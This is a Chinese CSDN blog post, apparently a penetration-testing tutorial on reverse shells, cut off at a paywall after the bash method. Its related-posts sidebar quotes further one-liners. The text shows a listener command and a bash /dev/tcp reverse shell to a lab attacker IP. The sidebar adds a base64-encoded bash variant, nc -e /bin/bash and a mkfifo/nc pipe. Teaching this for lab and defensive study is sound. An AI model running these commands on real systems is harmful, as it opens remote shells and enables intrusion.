Linux/Windows反弹shell

已于 2022-08-13 00:40:03 修改
阅读量2.5k 收藏 4
点赞数 2
分类专栏: 网安工具 Kali渗透测试 文章标签: shell linux 安全漏洞
于 2021-05-28 09:23:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45253622/article/details/117349738
版权
本文详细介绍了Linux和Windows环境下实现反弹shell的各种方法,包括bash、加密bash、Python、nc、Telnet、socat以及其他命令。在Linux中,通过bash命令与目标主机建立连接,并演示了如何加密shell流量。而在Windows系统中,提到了Powershell反弹nc shell以及使用MSF(Metasploit Framework)进行反弹shell的操作步骤。
摘要由CSDN通过智能技术生成

目录食用

Linux反弹shell

bash反弹

加密bash反弹shell的流量

Python反弹 

nc反弹

Telnet反弹

socat反弹

其他命令反弹

Windows反弹shell 

Powershell反弹nc shell

使用MSF反弹shell

Linux反弹shell

攻击机:192.168.41.142

靶机:192.168.41.138

bash反弹

Linux 反弹 shell 使用下面这条命令,该命令弹回来的shell是不可交互的,也就是比如 vim、passwd 命令不能用。

先在攻击机开启监听:nc -lvp 4444

然后在靶机反弹:bash -i >& /dev/tcp/192.168.41.142/4444 0>&1

命令原理:bash -i 是打开一个交互式的bash终端。/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。所以,不难理解,/dev/tcp/192.168.41.142/4444   这条命令是意思就是和192.168.41.142主机的4444端口建立一个socket连接。通过查阅资料,发现  >& 和 &> 两者一个意思,都是将标

了解本专栏 订阅专栏 解锁全文 超级会员免费看
carefree798
关注
专栏目录
订阅专栏
linux使用命令反弹到 msf
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-12 700
任选一个 payload 模块使用 ,这里我用。handler 会以后台的方式监听,更方便打开。如果在shell 状态 ,要先用。
LinuxWindows反弹shell以及变种
SHELLCODE_8BIT的博客
04-07 2380
Linux bash -i >& /dev/tcp/127.0.0.1/2333 0>&1 bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}' Windows
利用nc反弹cmdshell提权
01-27
利用nc反弹cmdshell提权 利用nc反弹cmdshell提权 利用nc反弹cmdshell提权
渗透测试-Linux反弹shell
lza20001103的博客
05-11 3117
Linux反弹shell
Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
09-06 2504
Cobalt Strike和Msf(Metasploit)之间的相互派生shell。完整的记录了Windows系统被控主机的cs与msf互相反弹shellLinux系统被控主机的反弹shell给cs和cs上的Linux主机反弹shell给msf。
渗透测试-window反弹shell
lza20001103的博客
05-11 4726
window反弹shell
Php shell端口反弹,Linux下通过webshell反弹shell总结
weixin_33253503的博客
03-12 438
反弹shell原因:Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令,但是溢出必须在可交互环境运行,否则如果直接在WebShell执行,即使能溢出提权成功,也没法 利用。因此必须要反弹一个Shell命令行窗口,在命令行终端下执行溢出进行提权。nc命令参数:参  数:-g设置路由器跃程通信网关,最丢哦可设置8个。-G设置来源路由指向器,其数值为...
Windows/Linux 下nc 反弹shell
SoulCat
06-11 1万+
*Windows/Linux 下nc 反弹shell 高二那年班主任对我们说:其实我并不反对你们谈恋爱, 只是你们记得要找一个有担当的, 那些一看见老师就松开你手的,要来有什么用? NC概述: nc又名netcat,一个简单而有用的工具,可以干很多事情,但是不可以吃。 何为反弹shell?为什么不反弹攻击? 相信你有一天可以直接把所有攻击反弹回去的. 何为反弹shell? 简单来说就...
Windows反弹shell乱码
墨痕诉清风的博客
04-06 769
Windows反弹shell乱码
Linux反弹Shell总结
qq_45600801的博客
01-06 4300
反弹姿势 1、NC正向反弹 靶机: nc -lvvp 靶机端口 -e /bin/sh 攻击机: nc 靶机ip 靶机端口 2、NC反向反弹 (1)、可使用-e参数: 靶机: nc x.x.x.x 8888 -e /bin/bash 攻击机: nc -lvvp 8888 (2)、NC,无-e参数反弹shell 有些版本的NC可能不支持-e选项,不能使用-e,则: 方法一: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc
反弹Shell方法论,Windows
大河之犬的博客
10-10 906
使用它你可以轻易的建立任何连接。要创建Powershell反向Shell,黑客需要在目标系统上运行一个恶意的Powershell脚本,该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术,用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本,用于建立与目标系统的反向连接。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。
windows反弹shell复现
就是我的博客
04-06 1万+
windows反弹shell 简介: reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
【web安全】反弹shell 靶场测试+实战
weixin_46301214的博客
11-22 520
NAT不一定可以,而且多了一行话,相同用户名的情况下还以为失败了。这里只讲实战或真机演练,具体原理网上一搜一大把,自己去看。知识点2:靶机测试 - 双kali - 脚本反弹。知识点2:靶机测试 - 双kali - 脚本反弹。知识点1:靶机测试 - 双kali。踩坑点:局域网内才稳定。:需要局域网内才稳定。
利用msf在windows反弹shell
Jiajiajiang_的博客
08-08 7162
靶机地址:10.0.3.146 攻击者地址:10.0.3.120 思路:生成一个shell,让靶机下载下来并执行。方法一是利用ftp下载,方法二是利用可信证书下载http网站的内容。 通过命令执行可以知道靶机是windows2003,32位的。(命令执行systeminfo) 首先利用kali生成一个shell, 命令:msfvenom -p windows/meterpreter...
反弹shell失败的几种原因
谢公子的博客
05-03 1万+
在实战中,我们经常会遇到各种各样奇怪的环境。 反弹shell失败的原因有很多: 反弹的命令不存在或当前用户无权限调用bash 禁止出站IP 禁止出站端口 禁止出站协议 反弹的命令不存在或当前用户无权限调用bash 由于这种情况下只局限于Linux,所以不考虑Windows 反弹shell的命令,尽管这么多命令可以反弹shell,但是最终都还是调用bash来反弹,所以 #bas...
Windows反弹Shell
最新发布
qq_62073002的博客
04-26 1021
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell)︰ 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。靶机:win11攻击机:vps。
Windows的几种常用反弹shell方法
热门推荐
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
Linux反弹Shell方法
weixin_43873557的博客
02-08 1920
文章目录Linux反弹Shell方法Linux标准文件描述符更改标准输出的位置更改标准输入的位置/dev/null重定向输入重定向输出重定向管道反弹shell的本质什么是反弹shell实现控制端和被控端之间的交互反弹shell方法NCBashPerlPythonPHPRubyTelnetOpenSSLRefer Linux反弹Shell方法 Linux标准文件描述符 Linux系统将所有设备都当作文件来处理,而Linux用文件描述符来标识每个文件对象。当Linux启动的时候会默认打开三个文件描述符。
windows服务器报linux反弹shell
09-01
windows服务器报告linux反弹shell时,这意味着有一个恶意用户或恶意软件已经成功地在服务器上执行了一个反向shell攻击,使用该攻击者在远程主机上运行命令的能力。 反弹shell是一种常见的攻击技术,攻击者可以利用它在目标服务器上运行命令并获取系统权限。在这种情况下,攻击者可能已经利用了一个已知的或未知的漏洞,并成功地获取了对服务器的控制权限。 一旦反弹shell攻击成功,攻击者可以执行各种恶意操作,包括窃取敏感数据、操纵系统设置、传播恶意软件等。这对服务器的安全性构成了重大威胁,并可能导致数据泄露、系统崩溃、业务中断等严重后果。 为了应对这种情况,服务器管理员应立即采取以下措施: 1.隔离受影响的服务器:立即将受攻击的服务器与网络隔离,以防止攻击者进一步的入侵和破坏。 2.立即修复漏洞:确定攻击者可能利用的漏洞,并及时安装相关的补丁或更新,以修复系统的安全漏洞。 3.分析取证:进行取证分析以确定攻击者的入侵途径、操作和造成的潜在损坏,这有助于更好地理解攻击事件和采取进一步的应对措施。 4.重置系统:重新安装操作系统和相关软件,以确保服务器的安全性,并通过合理的安全设置来预防类似的攻击。 5.增强安全措施:加强服务器的安全设置,例如使用防火墙、入侵检测系统、安全认证等来增强服务器的安全性。 在处理这种情况的过程中,及时报告并与安全专家、厂商和执法机构合作是非常重要的。通过综合应对方法和合作努力,能够更好地防止类似事件再次发生,并保护服务器和敏感数据的安全。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

carefree798

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值